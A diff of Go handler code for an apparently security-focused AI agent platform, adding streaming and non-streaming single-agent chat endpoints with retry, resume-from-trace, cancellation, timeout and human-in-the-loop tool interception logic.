h.audit.RecordOK(c, "conversation", "delete_turn", "删除对话轮次", "conversation", conversationID, map[string]interface{}{
|
||||
"message_id": req.MessageID,
|
||||
"deleted": len(deletedIDs),
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"deletedMessageIds": deletedIDs,
|
||||
"message": "ok",
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,180 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"fmt"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/agent"
|
||||
"cyberstrike-ai/internal/multiagent"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
func (h *AgentHandler) einoRunRetryMaxAttempts() int {
|
||||
if h.config != nil {
|
||||
return multiagent.RunRetryMaxAttemptsFromConfig(&h.config.MultiAgent.EinoMiddleware)
|
||||
}
|
||||
return multiagent.RunRetryMaxAttemptsFromConfig(nil)
|
||||
}
|
||||
|
||||
func (h *AgentHandler) einoRunRetryMaxBackoffSec() int {
|
||||
if h.config != nil && h.config.MultiAgent.EinoMiddleware.RunRetryMaxBackoffSec > 0 {
|
||||
return h.config.MultiAgent.EinoMiddleware.RunRetryMaxBackoffSec
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
// applyEinoTraceResumeSegment 中断并继续:persist last_react_* → loadHistory,可选替换下一段 user 文案。
|
||||
func (h *AgentHandler) applyEinoTraceResumeSegment(
|
||||
conversationID string,
|
||||
result *multiagent.RunResult,
|
||||
curHistory *[]agent.ChatMessage,
|
||||
curFinalMessage *string,
|
||||
segmentUserMessage string,
|
||||
) {
|
||||
if shouldPersistEinoAgentTraceAfterRunError(context.Background()) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
}
|
||||
if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 {
|
||||
*curHistory = hist
|
||||
}
|
||||
if segmentUserMessage != "" {
|
||||
*curFinalMessage = segmentUserMessage
|
||||
}
|
||||
}
|
||||
|
||||
// applyEinoTransientRetrySegment 临时错误重试:恢复轨迹并保留本请求原始 user 文案(不注入续跑说明)。
|
||||
// segmentUserMessage 为本轮 HTTP 请求开始时用户发送的内容,避免因清空 finalMessage 而丢失「你好」等短句。
|
||||
func (h *AgentHandler) applyEinoTransientRetrySegment(
|
||||
conversationID string,
|
||||
result *multiagent.RunResult,
|
||||
curHistory *[]agent.ChatMessage,
|
||||
curFinalMessage *string,
|
||||
segmentUserMessage string,
|
||||
) {
|
||||
if shouldPersistEinoAgentTraceAfterRunError(context.Background()) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
}
|
||||
if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 {
|
||||
*curHistory = hist
|
||||
}
|
||||
if s := strings.TrimSpace(segmentUserMessage); s != "" {
|
||||
*curFinalMessage = segmentUserMessage
|
||||
}
|
||||
}
|
||||
|
||||
// handleEinoTransientRetryContinue 在 SSE 任务循环内处理临时错误重试;返回 true 表示外层 for 应 continue。
|
||||
func (h *AgentHandler) handleEinoTransientRetryContinue(
|
||||
baseCtx context.Context,
|
||||
conversationID string,
|
||||
result *multiagent.RunResult,
|
||||
runErr error,
|
||||
transientAttempts *int,
|
||||
curHistory *[]agent.ChatMessage,
|
||||
curFinalMessage *string,
|
||||
segmentUserMessage string,
|
||||
progressCallback func(eventType, message string, data interface{}),
|
||||
sendProgress func(msg string, extra map[string]interface{}),
|
||||
) (handled bool, fatal error) {
|
||||
if !errors.Is(runErr, multiagent.ErrTransientRetryContinue) {
|
||||
return false, nil
|
||||
}
|
||||
maxAttempts := h.einoRunRetryMaxAttempts()
|
||||
*transientAttempts++
|
||||
if *transientAttempts > maxAttempts {
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
}
|
||||
return false, errors.New("transient retry exhausted: " + runErr.Error())
|
||||
}
|
||||
attemptNo := *transientAttempts
|
||||
backoff := multiagent.TransientRetryBackoff(attemptNo-1, h.einoRunRetryMaxBackoffSec())
|
||||
if progressCallback != nil {
|
||||
progressCallback("eino_run_retry", fmt.Sprintf("遇到临时错误,%d 秒后第 %d/%d 次重试…", int(backoff.Seconds()), attemptNo, maxAttempts), map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "eino",
|
||||
"attempt": attemptNo,
|
||||
"maxAttempts": maxAttempts,
|
||||
"backoffSec": int(backoff.Seconds()),
|
||||
})
|
||||
}
|
||||
select {
|
||||
case <-baseCtx.Done():
|
||||
return false, context.Cause(baseCtx)
|
||||
case <-time.After(backoff):
|
||||
}
|
||||
h.applyEinoTransientRetrySegment(conversationID, result, curHistory, curFinalMessage, segmentUserMessage)
|
||||
if progressCallback != nil {
|
||||
progressCallback("eino_run_retry", "已恢复上下文,正在重试…", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "eino",
|
||||
"attempt": attemptNo,
|
||||
})
|
||||
}
|
||||
if sendProgress != nil {
|
||||
sendProgress("正在重试…", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "transient_retry",
|
||||
})
|
||||
}
|
||||
return true, nil
|
||||
}
|
||||
|
||||
// handleEinoEmptyResponseContinue 在 SSE 任务循环内处理「正常结束但无助手正文」;返回 exhausted=true 时由外层按成功结束(保留占位文案)。
|
||||
// 与临时错误重试一致:仅恢复轨迹并保留本请求原始 user 文案,不向模型注入续跑说明。
|
||||
func (h *AgentHandler) handleEinoEmptyResponseContinue(
|
||||
baseCtx context.Context,
|
||||
conversationID string,
|
||||
result *multiagent.RunResult,
|
||||
runErr error,
|
||||
emptyResponseAttempts *int,
|
||||
curHistory *[]agent.ChatMessage,
|
||||
curFinalMessage *string,
|
||||
segmentUserMessage string,
|
||||
progressCallback func(eventType, message string, data interface{}),
|
||||
sendProgress func(msg string, extra map[string]interface{}),
|
||||
) (handled bool, exhausted bool) {
|
||||
if !errors.Is(runErr, multiagent.ErrEmptyResponseContinue) {
|
||||
return false, false
|
||||
}
|
||||
maxAttempts := h.einoRunRetryMaxAttempts()
|
||||
*emptyResponseAttempts++
|
||||
if *emptyResponseAttempts > maxAttempts {
|
||||
if h.logger != nil {
|
||||
h.logger.Warn("eino empty response auto resume exhausted",
|
||||
zap.String("conversationId", conversationID),
|
||||
zap.Int("maxAttempts", maxAttempts))
|
||||
}
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
}
|
||||
return false, true
|
||||
}
|
||||
attemptNo := *emptyResponseAttempts
|
||||
if h.logger != nil {
|
||||
h.logger.Info("eino empty response, auto resume from trace",
|
||||
zap.String("conversationId", conversationID),
|
||||
zap.Int("attempt", attemptNo),
|
||||
zap.Int("maxAttempts", maxAttempts))
|
||||
}
|
||||
if progressCallback != nil {
|
||||
progressCallback("eino_empty_response_continue", fmt.Sprintf("未捕获到助手正文,正在基于轨迹自动续跑(%d/%d)…", attemptNo, maxAttempts), map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "eino",
|
||||
"attempt": attemptNo,
|
||||
"maxAttempts": maxAttempts,
|
||||
"resumeKind": "trace_segment",
|
||||
})
|
||||
}
|
||||
h.applyEinoTransientRetrySegment(conversationID, result, curHistory, curFinalMessage, segmentUserMessage)
|
||||
if sendProgress != nil {
|
||||
sendProgress("已恢复上下文,正在继续推理…", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "empty_response_continue",
|
||||
})
|
||||
}
|
||||
return true, false
|
||||
}
|
||||
@@ -0,0 +1,511 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/multiagent"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// EinoSingleAgentLoopStream Eino ADK 单代理(ChatModelAgent + Runner)流式对话;不依赖 multi_agent.enabled。
|
||||
func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
||||
c.Header("Content-Type", "text/event-stream; charset=utf-8")
|
||||
c.Header("Cache-Control", "no-cache")
|
||||
c.Header("Connection", "keep-alive")
|
||||
|
||||
var req ChatRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
ev := StreamEvent{Type: "error", Message: "请求参数错误: " + err.Error()}
|
||||
b, _ := json.Marshal(ev)
|
||||
fmt.Fprintf(c.Writer, "data: %s\n\n", b)
|
||||
done := StreamEvent{Type: "done", Message: ""}
|
||||
db, _ := json.Marshal(done)
|
||||
fmt.Fprintf(c.Writer, "data: %s\n\n", db)
|
||||
if flusher, ok := c.Writer.(http.Flusher); ok {
|
||||
flusher.Flush()
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
c.Header("X-Accel-Buffering", "no")
|
||||
|
||||
var baseCtx context.Context
|
||||
clientDisconnected := false
|
||||
var sseWriteMu sync.Mutex
|
||||
var ssePublishConversationID string
|
||||
sendEvent := func(eventType, message string, data interface{}) {
|
||||
if eventType == "error" && baseCtx != nil {
|
||||
cause := context.Cause(baseCtx)
|
||||
if errors.Is(cause, ErrTaskCancelled) || errors.Is(cause, multiagent.ErrInterruptContinue) {
|
||||
return
|
||||
}
|
||||
}
|
||||
ev := StreamEvent{Type: eventType, Message: message, Data: data}
|
||||
b, errMarshal := json.Marshal(ev)
|
||||
if errMarshal != nil {
|
||||
b = []byte(`{"type":"error","message":"marshal failed"}`)
|
||||
}
|
||||
sseLine := make([]byte, 0, len(b)+8)
|
||||
sseLine = append(sseLine, []byte("data: ")...)
|
||||
sseLine = append(sseLine, b...)
|
||||
sseLine = append(sseLine, '\n', '\n')
|
||||
if ssePublishConversationID != "" && h.taskEventBus != nil {
|
||||
h.taskEventBus.Publish(ssePublishConversationID, sseLine)
|
||||
}
|
||||
if clientDisconnected {
|
||||
return
|
||||
}
|
||||
select {
|
||||
case <-c.Request.Context().Done():
|
||||
clientDisconnected = true
|
||||
return
|
||||
default:
|
||||
}
|
||||
sseWriteMu.Lock()
|
||||
_, err := c.Writer.Write(sseLine)
|
||||
if err != nil {
|
||||
sseWriteMu.Unlock()
|
||||
clientDisconnected = true
|
||||
return
|
||||
}
|
||||
if flusher, ok := c.Writer.(http.Flusher); ok {
|
||||
flusher.Flush()
|
||||
} else {
|
||||
c.Writer.Flush()
|
||||
}
|
||||
sseWriteMu.Unlock()
|
||||
}
|
||||
|
||||
h.logger.Info("收到 Eino ADK 单代理流式请求",
|
||||
zap.String("conversationId", req.ConversationID),
|
||||
)
|
||||
|
||||
prep, err := h.prepareMultiAgentSession(&req, c, "eino_agent_stream")
|
||||
if err != nil {
|
||||
sendEvent("error", err.Error(), nil)
|
||||
sendEvent("done", "", nil)
|
||||
return
|
||||
}
|
||||
ssePublishConversationID = prep.ConversationID
|
||||
if prep.CreatedNew {
|
||||
sendEvent("conversation", "会话已创建", map[string]interface{}{
|
||||
"conversationId": prep.ConversationID,
|
||||
})
|
||||
}
|
||||
|
||||
conversationID := prep.ConversationID
|
||||
assistantMessageID := prep.AssistantMessageID
|
||||
h.activateHITLForConversation(conversationID, req.Hitl)
|
||||
if h.hitlManager != nil {
|
||||
defer h.hitlManager.DeactivateConversation(conversationID)
|
||||
}
|
||||
|
||||
if prep.UserMessageID != "" {
|
||||
sendEvent("message_saved", "", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"userMessageId": prep.UserMessageID,
|
||||
})
|
||||
}
|
||||
|
||||
var cancelWithCause context.CancelCauseFunc
|
||||
curFinalMessage := prep.FinalMessage
|
||||
segmentUserMessage := prep.FinalMessage // 本请求原始用户句,临时重试时不得丢失
|
||||
curHistory := prep.History
|
||||
roleTools := prep.RoleTools
|
||||
|
||||
taskStatus := "completed"
|
||||
// 仅在成功 StartTask 后再 FinishTask。若 StartTask 因 ErrTaskAlreadyRunning 失败仍 defer FinishTask,
|
||||
// 会误删其他连接上正在运行的同会话任务,导致「第一次拦截、第二次却放行」。
|
||||
taskOwned := false
|
||||
defer func() {
|
||||
if taskOwned {
|
||||
h.tasks.FinishTask(conversationID, taskStatus)
|
||||
}
|
||||
}()
|
||||
|
||||
sendEvent("progress", "正在启动 Eino ADK 单代理(ChatModelAgent)...", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
})
|
||||
|
||||
stopKeepalive := make(chan struct{})
|
||||
go sseKeepalive(c, stopKeepalive, &sseWriteMu)
|
||||
defer close(stopKeepalive)
|
||||
|
||||
if h.config == nil {
|
||||
taskStatus = "failed"
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
sendEvent("error", "服务器配置未加载", nil)
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
return
|
||||
}
|
||||
|
||||
var result *multiagent.RunResult
|
||||
var runErr error
|
||||
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
|
||||
if _, err := h.tasks.StartTask(conversationID, req.Message, cancelWithCause); err != nil {
|
||||
var errorMsg string
|
||||
if errors.Is(err, ErrTaskAlreadyRunning) {
|
||||
errorMsg = "⚠️ 当前会话已有任务正在执行中,请等待当前任务完成或点击「停止任务」后再尝试。"
|
||||
sendEvent("error", errorMsg, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"errorType": "task_already_running",
|
||||
})
|
||||
} else {
|
||||
errorMsg = "❌ 无法启动任务: " + err.Error()
|
||||
sendEvent("error", errorMsg, nil)
|
||||
}
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errorMsg, time.Now(), assistantMessageID)
|
||||
}
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
timeoutCancel()
|
||||
return
|
||||
}
|
||||
taskOwned = true
|
||||
|
||||
var cumulativeMCPExecutionIDs []string
|
||||
var transientRunAttempts int
|
||||
var emptyResponseAttempts int
|
||||
// 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。
|
||||
var mainIterationOffset int
|
||||
|
||||
for {
|
||||
segmentMainIterationMax := 0
|
||||
rawProgressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
|
||||
progressCallback := func(eventType, message string, data interface{}) {
|
||||
if eventType == "iteration" {
|
||||
if m, ok := data.(map[string]interface{}); ok {
|
||||
if scope, _ := m["einoScope"].(string); scope == "main" {
|
||||
raw := 0
|
||||
switch v := m["iteration"].(type) {
|
||||
case int:
|
||||
raw = v
|
||||
case int32:
|
||||
raw = int(v)
|
||||
case int64:
|
||||
raw = int(v)
|
||||
case float64:
|
||||
raw = int(v)
|
||||
case float32:
|
||||
raw = int(v)
|
||||
}
|
||||
if raw > 0 {
|
||||
if raw > segmentMainIterationMax {
|
||||
segmentMainIterationMax = raw
|
||||
}
|
||||
m["iteration"] = raw + mainIterationOffset
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
rawProgressCallback(eventType, message, data)
|
||||
}
|
||||
taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID)
|
||||
taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks)
|
||||
taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) {
|
||||
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
|
||||
})
|
||||
|
||||
result, runErr = multiagent.RunEinoSingleChatModelAgent(
|
||||
taskCtxLoop,
|
||||
h.config,
|
||||
&h.config.MultiAgent,
|
||||
h.agent,
|
||||
h.logger,
|
||||
conversationID,
|
||||
h.conversationProjectID(conversationID),
|
||||
curFinalMessage,
|
||||
curHistory,
|
||||
roleTools,
|
||||
progressCallback,
|
||||
chatReasoningToClientIntent(req.Reasoning),
|
||||
h.projectBlackboardBlock(conversationID),
|
||||
)
|
||||
|
||||
if result != nil && len(result.MCPExecutionIDs) > 0 {
|
||||
cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs)
|
||||
}
|
||||
|
||||
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
|
||||
baseCtx, conversationID, result, runErr, &emptyResponseAttempts,
|
||||
&curHistory, &curFinalMessage, segmentUserMessage, progressCallback,
|
||||
func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) },
|
||||
)
|
||||
if exhaustedEmpty {
|
||||
runErr = nil
|
||||
transientRunAttempts = 0
|
||||
timeoutCancel()
|
||||
break
|
||||
}
|
||||
if handledEmpty {
|
||||
mainIterationOffset += segmentMainIterationMax
|
||||
transientRunAttempts = 0
|
||||
timeoutCancel()
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
||||
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
h.tasks.UpdateTaskStatus(conversationID, "running")
|
||||
continue
|
||||
}
|
||||
|
||||
if runErr == nil {
|
||||
// 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。
|
||||
transientRunAttempts = 0
|
||||
emptyResponseAttempts = 0
|
||||
timeoutCancel()
|
||||
break
|
||||
}
|
||||
|
||||
handled, fatalErr := h.handleEinoTransientRetryContinue(
|
||||
baseCtx, conversationID, result, runErr, &transientRunAttempts,
|
||||
&curHistory, &curFinalMessage, segmentUserMessage, progressCallback,
|
||||
func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) },
|
||||
)
|
||||
if handled {
|
||||
mainIterationOffset += segmentMainIterationMax
|
||||
timeoutCancel()
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
||||
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
h.tasks.UpdateTaskStatus(conversationID, "running")
|
||||
continue
|
||||
}
|
||||
if fatalErr != nil {
|
||||
runErr = fatalErr
|
||||
}
|
||||
|
||||
cause := context.Cause(baseCtx)
|
||||
if errors.Is(cause, multiagent.ErrInterruptContinue) {
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
}
|
||||
note := h.tasks.TakeInterruptContinueNote(conversationID)
|
||||
icSummary := interruptContinueTimelineSummary(note)
|
||||
progressCallback("user_interrupt_continue", icSummary, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"rawReason": strings.TrimSpace(note),
|
||||
"emptyReason": strings.TrimSpace(note) == "",
|
||||
"kind": "no_active_mcp_tool",
|
||||
})
|
||||
inject := formatInterruptContinueUserMessage(note)
|
||||
// 不写入 messages 表为 user 气泡:避免主对话流出现大段模板;说明已由 user_interrupt_continue 记入助手 process_details(迭代详情)。
|
||||
if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 {
|
||||
curHistory = hist
|
||||
}
|
||||
curFinalMessage = inject
|
||||
sendEvent("progress", "已合并用户补充与最新轨迹,正在继续推理…", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "interrupt_continue",
|
||||
})
|
||||
mainIterationOffset += segmentMainIterationMax
|
||||
// 非临时错误分段续跑(用户中断并继续)时,清空 transient 计数,避免跨分段累加。
|
||||
transientRunAttempts = 0
|
||||
timeoutCancel()
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
||||
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
h.tasks.UpdateTaskStatus(conversationID, "running")
|
||||
continue
|
||||
}
|
||||
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
}
|
||||
if errors.Is(cause, ErrTaskCancelled) {
|
||||
taskStatus = "cancelled"
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
cancelMsg := "任务已被用户取消,后续操作已停止。"
|
||||
if assistantMessageID != "" {
|
||||
if result != nil {
|
||||
if err := h.mergeAssistantMessagePartialOnCancel(assistantMessageID, result.Response); err != nil {
|
||||
h.logger.Warn("合并取消前的部分回复失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
if err := h.appendAssistantMessageNotice(assistantMessageID, cancelMsg); err != nil {
|
||||
h.logger.Warn("更新取消后的助手消息失败", zap.Error(err))
|
||||
}
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "cancelled", cancelMsg, nil)
|
||||
}
|
||||
sendEvent("cancelled", cancelMsg, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"messageId": assistantMessageID,
|
||||
})
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
timeoutCancel()
|
||||
return
|
||||
}
|
||||
|
||||
if errors.Is(runErr, context.DeadlineExceeded) || errors.Is(context.Cause(taskCtx), context.DeadlineExceeded) {
|
||||
taskStatus = "timeout"
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
timeoutMsg := "任务执行超时,已自动终止。"
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", timeoutMsg, time.Now(), assistantMessageID)
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "timeout", timeoutMsg, nil)
|
||||
}
|
||||
sendEvent("error", timeoutMsg, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"messageId": assistantMessageID,
|
||||
"errorType": "timeout",
|
||||
})
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
timeoutCancel()
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Error("Eino ADK 单代理执行失败", zap.Error(runErr))
|
||||
taskStatus = "failed"
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
errMsg := "执行失败: " + runErr.Error()
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), assistantMessageID)
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil)
|
||||
}
|
||||
sendEvent("error", errMsg, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"messageId": assistantMessageID,
|
||||
})
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
timeoutCancel()
|
||||
return
|
||||
}
|
||||
|
||||
timeoutCancel()
|
||||
|
||||
if assistantMessageID != "" {
|
||||
_ = h.db.UpdateAssistantMessageFinalize(assistantMessageID, result.Response, cumulativeMCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput))
|
||||
}
|
||||
|
||||
if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" {
|
||||
if err := h.db.SaveAgentTrace(conversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil {
|
||||
h.logger.Warn("保存代理轨迹失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
|
||||
sendEvent("response", result.Response, map[string]interface{}{
|
||||
"mcpExecutionIds": cumulativeMCPExecutionIDs,
|
||||
"conversationId": conversationID,
|
||||
"messageId": assistantMessageID,
|
||||
"agentMode": "eino_single",
|
||||
})
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
}
|
||||
|
||||
// EinoSingleAgentLoop Eino ADK 单代理非流式对话。
|
||||
func (h *AgentHandler) EinoSingleAgentLoop(c *gin.Context) {
|
||||
var req ChatRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("收到 Eino ADK 单代理非流式请求", zap.String("conversationId", req.ConversationID))
|
||||
|
||||
prep, err := h.prepareMultiAgentSession(&req, c, "eino_agent")
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
h.activateHITLForConversation(prep.ConversationID, req.Hitl)
|
||||
if h.hitlManager != nil {
|
||||
defer h.hitlManager.DeactivateConversation(prep.ConversationID)
|
||||
}
|
||||
|
||||
var progressBuf strings.Builder
|
||||
progressCallbackRaw := func(eventType, message string, data interface{}) {
|
||||
progressBuf.WriteString(eventType)
|
||||
progressBuf.WriteByte('\n')
|
||||
}
|
||||
baseCtx, cancelWithCause := context.WithCancelCause(c.Request.Context())
|
||||
defer cancelWithCause(nil)
|
||||
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
defer timeoutCancel()
|
||||
progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, progressCallbackRaw)
|
||||
taskCtx = multiagent.WithHITLToolInterceptor(taskCtx, func(ctx context.Context, toolName, arguments string) (string, error) {
|
||||
return h.interceptHITLForEinoTool(ctx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil, toolName, arguments)
|
||||
})
|
||||
|
||||
if h.config == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "服务器配置未加载"})
|
||||
return
|
||||
}
|
||||
|
||||
curHist := prep.History
|
||||
curMsg := prep.FinalMessage
|
||||
var result *multiagent.RunResult
|
||||
var runErr error
|
||||
var transientRunAttempts int
|
||||
var emptyResponseAttempts int
|
||||
for {
|
||||
result, runErr = multiagent.RunEinoSingleChatModelAgent(
|
||||
taskCtx,
|
||||
h.config,
|
||||
&h.config.MultiAgent,
|
||||
h.agent,
|
||||
h.logger,
|
||||
prep.ConversationID,
|
||||
h.conversationProjectID(prep.ConversationID),
|
||||
curMsg,
|
||||
curHist,
|
||||
prep.RoleTools,
|
||||
progressCallback,
|
||||
chatReasoningToClientIntent(req.Reasoning),
|
||||
h.projectBlackboardBlock(prep.ConversationID),
|
||||
)
|
||||
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
|
||||
baseCtx, prep.ConversationID, result, runErr, &emptyResponseAttempts,
|
||||
&curHist, &curMsg, prep.FinalMessage, progressCallback, nil,
|
||||
)
|
||||
if exhaustedEmpty {
|
||||
runErr = nil
|
||||
break
|
||||
}
|
||||
if handledEmpty {
|
||||
continue
|
||||
}
|
||||
if runErr == nil {
|
||||
break
|
||||
}
|
||||
if handled, fatalErr := h.handleEinoTransientRetryContinue(
|
||||
baseCtx, prep.ConversationID, result, runErr, &transientRunAttempts,
|
||||
&curHist, &curMsg, prep.FinalMessage, progressCallback, nil,
|
||||
); handled {
|
||||
continue
|
||||
} else if fatalErr != nil {
|
||||
runErr = fatalErr
|
||||
}
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": runErr.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if prep.AssistantMessageID != "" {
|
||||
_ = h.db.UpdateAssistantMessageFinalize(prep.AssistantMessageID, result.Response, result.MCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput))
|
||||
}
|
||||
if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" {
|
||||
_ = h.db.SaveAgentTrace(prep.ConversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput)
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"response": result.Response,
|
||||
"conversationId": prep.ConversationID,
|
||||
"mcpExecutionIds": result.MCPExecutionIDs,
|
||||
"assistantMessageId": prep.AssistantMessageID,
|
||||
"agentMode": "eino_single",
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,485 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net/http"
|
||||
"os"
|
||||
"sync"
|
||||
|
||||
"cyberstrike-ai/internal/audit"
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
"gopkg.in/yaml.v3"
|
||||
)
|
||||
|
||||
// ExternalMCPHandler 外部MCP处理器
|
||||
type ExternalMCPHandler struct {
|
||||
manager *mcp.ExternalMCPManager
|
||||
config *config.Config
|
||||
configPath string
|
||||
logger *zap.Logger
|
||||
audit *audit.Service
|
||||
mu sync.RWMutex
|
||||
}
|
||||
|
||||
// SetAudit wires platform audit logging.
|
||||
func (h *ExternalMCPHandler) SetAudit(s *audit.Service) {
|
||||
h.audit = s
|
||||
}
|
||||
|
||||
// NewExternalMCPHandler 创建外部MCP处理器
|
||||
func NewExternalMCPHandler(manager *mcp.ExternalMCPManager, cfg *config.Config, configPath string, logger *zap.Logger) *ExternalMCPHandler {
|
||||
return &ExternalMCPHandler{
|
||||
manager: manager,
|
||||
config: cfg,
|
||||
configPath: configPath,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
